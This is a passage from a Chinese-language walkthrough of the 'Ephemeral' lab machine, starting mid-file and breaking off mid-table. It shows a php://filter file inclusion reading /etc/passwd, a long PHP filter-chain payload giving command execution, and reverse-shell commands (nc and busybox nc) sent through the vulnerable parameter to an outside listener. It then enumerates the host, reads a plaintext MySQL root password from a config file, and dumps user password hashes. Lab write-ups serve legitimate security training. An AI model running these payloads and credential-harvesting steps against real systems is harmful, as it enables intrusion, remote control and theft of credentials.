daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:128:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:129:135:MySQL Server,,,:\/nonexistent:\/bin\/false\njane:x:1001:1001:,,,:\/home\/jane:\/bin\/bash\ndonald:x:1004:1004::\/home\/donald:\/bin\/rbash\nrandy:x:1002:1002:,,,:\/home\/randy:\/bin\/bash<\/code><\/pre>\n
php filter \u94fe\u6784\u9020<\/h3>\n
\u7136\u540e\u5c1d\u8bd5\u4f2a\u534f\u8bae\u8fdb\u884c\u5305\u542b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# http get http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\nHTTP\/1.1 200 OK\nConnection: Keep-Alive\nContent-Encoding: gzip\nContent-Length: 1699\nContent-Type: text\/html; charset=UTF-8\nDate: Tue, 30 Apr 2024 07:13:55 GMT\nKeep-Alive: timeout=5, max=100\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\n\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTE6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExNDo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExNTo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmF2YWhpLWF1dG9pcGQ6eDoxMDk6MTE2OkF2YWhpIGF1dG9pcCBkYWVtb24sLCw6L3Zhci9saWIvYXZhaGktYXV0b2lwZDovdXNyL3NiaW4vbm9sb2dpbgp1c2JtdXg6eDoxMTA6NDY6dXNibXV4IGRhZW1vbiwsLDovdmFyL2xpYi91c2JtdXg6L3Vzci9zYmluL25vbG9naW4KcnRraXQ6eDoxMTE6MTE3OlJlYWx0aW1lS2l0LCwsOi9wcm9jOi91c3Ivc2Jpbi9ub2xvZ2luCmRuc21hc3E6eDoxMTI6NjU1MzQ6ZG5zbWFzcSwsLDovdmFyL2xpYi9taXNjOi91c3Ivc2Jpbi9ub2xvZ2luCmN1cHMtcGstaGVscGVyOng6MTEzOjEyMDp1c2VyIGZvciBjdXBzLXBrLWhlbHBlciBzZXJ2aWNlLCwsOi9ob21lL2N1cHMtcGstaGVscGVyOi91c3Ivc2Jpbi9ub2xvZ2luCnNwZWVjaC1kaXNwYXRjaGVyOng6MTE0OjI5OlNwZWVjaCBEaXNwYXRjaGVyLCwsOi9ydW4vc3BlZWNoLWRpc3BhdGNoZXI6L2Jpbi9mYWxzZQphdmFoaTp4OjExNToxMjE6QXZhaGkgbUROUyBkYWVtb24sLCw6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi91c3Ivc2Jpbi9ub2xvZ2luCmtlcm5vb3BzOng6MTE2OjY1NTM0Oktlcm5lbCBPb3BzIFRyYWNraW5nIERhZW1vbiwsLDovOi91c3Ivc2Jpbi9ub2xvZ2luCnNhbmVkOng6MTE3OjEyMzo6L3Zhci9saWIvc2FuZWQ6L3Vzci9zYmluL25vbG9naW4Kbm0tb3BlbnZwbjp4OjExODoxMjQ6TmV0d29ya01hbmFnZXIgT3BlblZQTiwsLDovdmFyL2xpYi9vcGVudnBuL2Nocm9vdDovdXNyL3NiaW4vbm9sb2dpbgpocGxpcDp4OjExOTo3OkhQTElQIHN5c3RlbSB1c2VyLCwsOi9ydW4vaHBsaXA6L2Jpbi9mYWxzZQp3aG9vcHNpZTp4OjEyMDoxMjU6Oi9ub25leGlzdGVudDovYmluL2ZhbHNlCmNvbG9yZDp4OjEyMToxMjY6Y29sb3JkIGNvbG91ciBtYW5hZ2VtZW50IGRhZW1vbiwsLDovdmFyL2xpYi9jb2xvcmQ6L3Vzci9zYmluL25vbG9naW4KZ2VvY2x1ZTp4OjEyMjoxMjc6Oi92YXIvbGliL2dlb2NsdWU6L3Vzci9zYmluL25vbG9naW4KcHVsc2U6eDoxMjM6MTI4OlB1bHNlQXVkaW8gZGFlbW9uLCwsOi92YXIvcnVuL3B1bHNlOi91c3Ivc2Jpbi9ub2xvZ2luCmdub21lLWluaXRpYWwtc2V0dXA6eDoxMjQ6NjU1MzQ6Oi9ydW4vZ25vbWUtaW5pdGlhbC1zZXR1cC86L2Jpbi9mYWxzZQpnZG06eDoxMjU6MTMwOkdub21lIERpc3BsYXkgTWFuYWdlcjovdmFyL2xpYi9nZG0zOi9iaW4vZmFsc2UKc3NzZDp4OjEyNjoxMzE6U1NTRCBzeXN0ZW0gdXNlciwsLDovdmFyL2xpYi9zc3M6L3Vzci9zYmluL25vbG9naW4Ka2V2aW46eDoxMDAwOjEwMDA6a2V2aW4sLCw6L2hvbWUva2V2aW46L2Jpbi9iYXNoCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgpmdHA6eDoxMjc6MTM0OmZ0cCBkYWVtb24sLCw6L3Nydi9mdHA6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEyODo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCm15c3FsOng6MTI5OjEzNTpNeVNRTCBTZXJ2ZXIsLCw6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKamFuZTp4OjEwMDE6MTAwMTosLCw6L2hvbWUvamFuZTovYmluL2Jhc2gKZG9uYWxkOng6MTAwNDoxMDA0OjovaG9tZS9kb25hbGQ6L2Jpbi9yYmFzaApyYW5keTp4OjEwMDI6MTAwMjosLCw6L2hvbWUvcmFuZHk6L2Jpbi9iYXNoCg==<\/code><\/pre>\n
\u5c1d\u8bd5\u6784\u9020php\u4f2a\u534f\u8bae\u94fe\uff1a<\/p>\n
http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n
\"image-20240430151533944\"<\/div><\/p>\n
\u8fdb\u884c\u53cd\u5f39shell<\/a> \uff1a<\/p>\n
http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&0=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n
\u4f46\u662f\u6ca1\u6210\u529f\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7f16\u7801\uff1a<\/p>\n
http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&0=nc+-e+%2Fbin%2Fbash+192.168.0.143+1234<\/code><\/pre>\n
\u518d\u6362\u4e00\u4e2a\uff1a<\/p>\n
http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=payload&0=busybox%20nc%20192.168.0.143%201234%20-e%20bash<\/code><\/pre>\n
\u6b38\u563f\uff0c\u5f39\u8fc7\u6765\u4e86\uff01\uff01\uff01<\/p>\n
\"image-20240430152419053\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@ephemeral:\/var\/www\/html\/prices$ ls -la\ntotal 12\ndrwxr-xr-x  2 www-data www-data 4096 Mar 15  2022 .\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 ..\n-rw-r--r--  1 www-data www-data  150 Mar 15  2022 filedownload.php\n(remote) www-data@ephemeral:\/var\/www\/html\/prices$ cd ..\n(remote) www-data@ephemeral:\/var\/www\/html$ ls -la\ntotal 356\ndrwxr-xr-x 11 www-data www-data  4096 Mar 17  2022 .\ndrwxr-xr-x  3 root     root      4096 Mar 14  2022 ..\n-rw-r--r--  1 www-data www-data  1309 Aug 12  2020 LICENSE.txt\n-rw-r--r--  1 www-data www-data   541 Oct 11  2020 READ-ME.txt\n-rw-r--r--  1 www-data www-data 18464 Oct 11  2020 about.html\n-rw-r--r--  1 www-data www-data 20094 Oct 11  2020 blog.html\n-rw-r--r--  1 www-data www-data 14677 Oct 11  2020 booking.html\n-rw-r--r--  1 www-data www-data 66386 Oct 11  2020 car-wash-website-template.jpg\ndrwxr-xr-x  2 www-data www-data  4096 Mar 17  2022 cd\n-rw-r--r--  1 www-data www-data 15151 Oct 11  2020 contact.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 css\ndrwxr-xr-x  2 www-data www-data  4096 Oct 12  2020 img\n-rw-r--r--  1 www-data www-data 39494 Oct 11  2020 index.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 js\ndrwxr-xr-x  8 www-data www-data  4096 Oct 11  2020 lib\n-rw-r--r--  1 www-data www-data 14685 Oct 11  2020 location.html\ndrwxr-xr-x  2 www-data www-data  4096 Oct 11  2020 mail\n-rw-r--r--  1 www-data www-data    44 Mar 15  2022 phpsysinfo.php\ndrwxr-xr-x  2 www-data www-data  4096 Mar 17  2022 price\n-rw-r--r--  1 www-data www-data 14635 Oct 11  2020 price.html\ndrwxr-xr-x  2 www-data www-data  4096 Mar 15  2022 prices\ndrwxr-xr-x  2 root     root      4096 Mar 17  2022 private_html\n-rw-r--r--  1 www-data www-data 16853 Oct 11  2020 service.html\n-rw-r--r--  1 www-data www-data 48856 Oct 11  2020 single.html\n-rw-r--r--  1 www-data www-data 18605 Oct 11  2020 team.html\n(remote) www-data@ephemeral:\/var\/www\/html$ cd private_html\/\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ls -la\ntotal 12\ndrwxr-xr-x  2 root     root     4096 Mar 17  2022 .\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 ..\n-rwxrwxr-x  1 root     root      337 Mar 17  2022 app.py\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ cat app.py \nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route("\/page")\ndef page():\n\n    name = request.values.get('name')\n\n    output = Jinja2.from_string('Welcome ' + name + '!').render()\n\n    return output\n\nif __name__ == "__main__":\n    app.run(host='0.0.0.0', port=5000)\n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ss -atlp \nState            Recv-Q           Send-Q                       Local Address:Port                         Peer Address:Port           Process           \nLISTEN           0                128                                0.0.0.0:ssh                               0.0.0.0:*                                \nLISTEN           0                5                                127.0.0.1:ipp                               0.0.0.0:*                                \nLISTEN           0                70                               127.0.0.1:33060                             0.0.0.0:*                                \nLISTEN           0                151                              127.0.0.1:mysql                             0.0.0.0:*                                \nLISTEN           0                4096                             127.0.0.1:41229                             0.0.0.0:*                                \nLISTEN           0                4096                         127.0.0.53%lo:domain                            0.0.0.0:*                                \nLISTEN           0                128                                   [::]:ssh                                  [::]:*                                \nLISTEN           0                5                                    [::1]:ipp                                  [::]:*                                \nLISTEN           0                511                                      *:http                                    *:*                                \nLISTEN           0                32                                       *:ftp                                     *:*                                \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                    Peer Address:Port         Process         \nudp            UNCONN          0               0                              0.0.0.0:631                          0.0.0.0:*                            \nudp            UNCONN          0               0                        127.0.0.53%lo:53                           0.0.0.0:*                            \nudp            UNCONN          0               0                              0.0.0.0:5353                         0.0.0.0:*                            \nudp            UNCONN          0               0                              0.0.0.0:41443                        0.0.0.0:*                            \nudp            UNCONN          0               0                                 [::]:60043                           [::]:*                            \nudp            UNCONN          0               0                                 [::]:5353                            [::]:*                            \ntcp            LISTEN          0               128                            0.0.0.0:22                           0.0.0.0:*                            \ntcp            LISTEN          0               5                            127.0.0.1:631                          0.0.0.0:*                            \ntcp            LISTEN          0               70                           127.0.0.1:33060                        0.0.0.0:*                            \ntcp            LISTEN          0               151                          127.0.0.1:3306                         0.0.0.0:*                            \ntcp            LISTEN          0               4096                         127.0.0.1:41229                        0.0.0.0:*                            \ntcp            LISTEN          0               4096                     127.0.0.53%lo:53                           0.0.0.0:*                            \ntcp            LISTEN          0               128                               [::]:22                              [::]:*                            \ntcp            LISTEN          0               5                                [::1]:631                             [::]:*                            \ntcp            LISTEN          0               511                                  *:80                                 *:*                            \ntcp            LISTEN          0               32                                   *:21                                 *:* \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ sudo -l\n[sudo] password for www-data: \n(remote) www-data@ephemeral:\/var\/www\/html\/private_html$ cd ..\/\n(remote) www-data@ephemeral:\/var\/www\/html$ cd ..\/\n(remote) www-data@ephemeral:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Mar 14  2022 .\ndrwxr-xr-x 15 root     root     4096 Mar 14  2022 ..\ndrwxr-xr-x 11 www-data www-data 4096 Mar 17  2022 html\n(remote) www-data@ephemeral:\/var\/www$ cd ..\/\n(remote) www-data@ephemeral:\/var$ ls -la\ntotal 60\ndrwxr-xr-x 15 root root     4096 Mar 14  2022 .\ndrwxr-xr-x 21 root root     4096 Mar 17  2022 ..\ndrwxr-xr-x  2 root root     4096 Mar 18  2022 backups\ndrwxr-xr-x 18 root root     4096 Mar 15  2022 cache\ndrwxrwsrwt  2 root whoopsie 4096 Apr 29 23:56 crash\ndrwxr-xr-x 78 root root     4096 Mar 16  2022 lib\ndrwxrwsr-x  2 root staff    4096 Apr 15  2020 local\nlrwxrwxrwx  1 root root        9 Mar 14  2022 lock -> \/run\/lock\ndrwxrwxr-x 15 root syslog   4096 Apr 29 23:52 log\ndrwxrwsr-x  2 root mail     4096 Feb 23  2022 mail\ndrwxrwsrwt  2 root whoopsie 4096 Feb 23  2022 metrics\ndrwxr-xr-x  2 root root     4096 Feb 23  2022 opt\nlrwxrwxrwx  1 root root        4 Mar 14  2022 run -> \/run\ndrwxr-xr-x  8 root root     4096 Feb 23  2022 snap\ndrwxr-xr-x  6 root root     4096 Mar 14  2022 spool\ndrwxrwxrwt  2 root root     4096 Apr 30  2024 tmp\ndrwxr-xr-x  3 root root     4096 Mar 14  2022 www\n(remote) www-data@ephemeral:\/var$ cd backups\/\n(remote) www-data@ephemeral:\/var\/backups$ ls -la\n.............\n(remote) www-data@ephemeral:\/var\/backups$ cd ..\/mail\n(remote) www-data@ephemeral:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x  2 root mail 4096 Feb 23  2022 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/mail$ cd ..\/opt\n(remote) www-data@ephemeral:\/var\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Feb 23  2022 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/opt$ cd ..\/tmp \n(remote) www-data@ephemeral:\/var\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 Apr 30  2024 .\ndrwxr-xr-x 15 root root 4096 Mar 14  2022 ..\n(remote) www-data@ephemeral:\/var\/tmp$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nkevin:x:1000:1000:kevin,,,:\/home\/kevin:\/bin\/bash\njane:x:1001:1001:,,,:\/home\/jane:\/bin\/bash\ndonald:x:1004:1004::\/home\/donald:\/bin\/rbash\nrandy:x:1002:1002:,,,:\/home\/randy:\/bin\/bash\n(remote) www-data@ephemeral:\/var\/tmp$ cd \/home\n(remote) www-data@ephemeral:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root   root   4096 Mar 15  2022 .\ndrwxr-xr-x 21 root   root   4096 Mar 17  2022 ..\ndrwx------  8 donald donald 4096 Mar 17  2022 donald\ndrwx------  6 jane   jane   4096 Mar 17  2022 jane\ndrwx------ 14 kevin  kevin  4096 Mar 17  2022 kevin\ndrwx------  6 randy  randy  4096 Mar 17  2022 randy\n(remote) www-data@ephemeral:\/home$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount\n\/usr\/bin\/screen-4.5.0\n\/usr\/bin\/passwd\n\/usr\/bin\/vmware-user-suid-wrapper\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pppd\n\/snap\/core20\/2264\/usr\/bin\/chfn\n\/snap\/core20\/2264\/usr\/bin\/chsh\n\/snap\/core20\/2264\/usr\/bin\/gpasswd\n\/snap\/core20\/2264\/usr\/bin\/mount\n\/snap\/core20\/2264\/usr\/bin\/newgrp\n\/snap\/core20\/2264\/usr\/bin\/passwd\n\/snap\/core20\/2264\/usr\/bin\/su\n\/snap\/core20\/2264\/usr\/bin\/sudo\n\/snap\/core20\/2264\/usr\/bin\/umount\n\/snap\/core20\/2264\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2264\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1376\/usr\/bin\/chfn\n\/snap\/core20\/1376\/usr\/bin\/chsh\n\/snap\/core20\/1376\/usr\/bin\/gpasswd\n\/snap\/core20\/1376\/usr\/bin\/mount\n\/snap\/core20\/1376\/usr\/bin\/newgrp\n\/snap\/core20\/1376\/usr\/bin\/passwd\n\/snap\/core20\/1376\/usr\/bin\/su\n\/snap\/core20\/1376\/usr\/bin\/sudo\n\/snap\/core20\/1376\/usr\/bin\/umount\n\/snap\/core20\/1376\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1376\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/21465\/usr\/lib\/snapd\/snap-confine\n(remote) www-data@ephemeral:\/home$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n\/snap\/core20\/2264\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1376\/usr\/bin\/ping = cap_net_raw+ep\n(remote) www-data@ephemeral:\/home$ cd \/opt\n(remote) www-data@ephemeral:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Mar 16  2022 .\ndrwxr-xr-x 21 root root 4096 Mar 17  2022 ..\ndrwx--x--x  4 root root 4096 Mar 16  2022 containerd<\/code><\/pre>\n
\u4e0a\u4f20linpeas.sh \u548c pspy64<\/h3>\n
\"image-20240430153615327\"<\/div>
\n
\"image-20240430153822808\"<\/div><\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking if containerd(ctr) is available\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/containerd-ctr-privilege-escalation\nctr was found in \/usr\/bin\/ctr, you may be able to escalate privileges with it\nctr: failed to dial "\/run\/containerd\/containerd.sock": connection error: desc = "transport: error while dialing: dial unix \/run\/containerd\/containerd.sock: connect: permission denied"\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking if runc is available\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation\nrunc was found in \/usr\/sbin\/runc, you may be able to escalate privileges with it<\/code><\/pre>\n
\"image-20240430154415208\"<\/div><\/p>\n
Mysql\u83b7\u53d6\u4fe1\u606f<\/h3>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
(remote) www-data@ephemeral:\/tmp$ cd \/etc\/mysql\n(remote) www-data@ephemeral:\/etc\/mysql$ ls -la\ntotal 44\ndrwxr-xr-x   4 root root  4096 Mar 15  2022 .\ndrwxr-xr-x 134 root root 12288 Mar 18  2022 ..\n-rw-r--r--   1 root root    49 Mar 15  2022 .my.cnf\ndrwxr-xr-x   2 root root  4096 Feb 23  2022 conf.d\n-rwxr-xr-x   1 root root   120 Jan 28  2022 debian-start\n-rw-------   1 root root   317 Mar 15  2022 debian.cnf\nlrwxrwxrwx   1 root root    24 Mar 14  2022 my.cnf -> \/etc\/alternatives\/my.cnf\n-rw-r--r--   1 root root   839 Aug  3  2016 my.cnf.fallback\n-rw-r--r--   1 root root   682 Aug 19  2021 mysql.cnf\ndrwxr-xr-x   2 root root  4096 Mar 15  2022 mysql.conf.d\n(remote) www-data@ephemeral:\/etc\/mysql$ cat .my.cnf\n[client]\nuser=root\npassword=RanDydBPa$$w0rd0987<\/code><\/pre>\n
\u62ff\u5230\u6570\u636e\u5e93\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
(remote) www-data@ephemeral:\/$ mysql -u  root -p\nEnter password: \nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 13\nServer version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)\n\nCopyright (c) 2000, 2022, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nmysql> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| ephemeral_users    |\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.50 sec)\n\nmysql> use ephemeral_users;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+---------------------------+\n| Tables_in_ephemeral_users |\n+---------------------------+\n| ephemeral_users           |\n+---------------------------+\n1 row in set (0.00 sec)\n\nmysql> select * from ephemeral_users;\n+--------+------------------------------------------+\n| user   | password                                 |\n+--------+------------------------------------------+\n| kevin  | a7f30291fe998b2f188678090b40d8307ffdeddd |\n| donald | 603ebcdd05c78c0a635b7b0846ef8ad5758b6d7c |\n| jane   | 84f66bc55f616fe45b4d996896e4c9e4121264ef 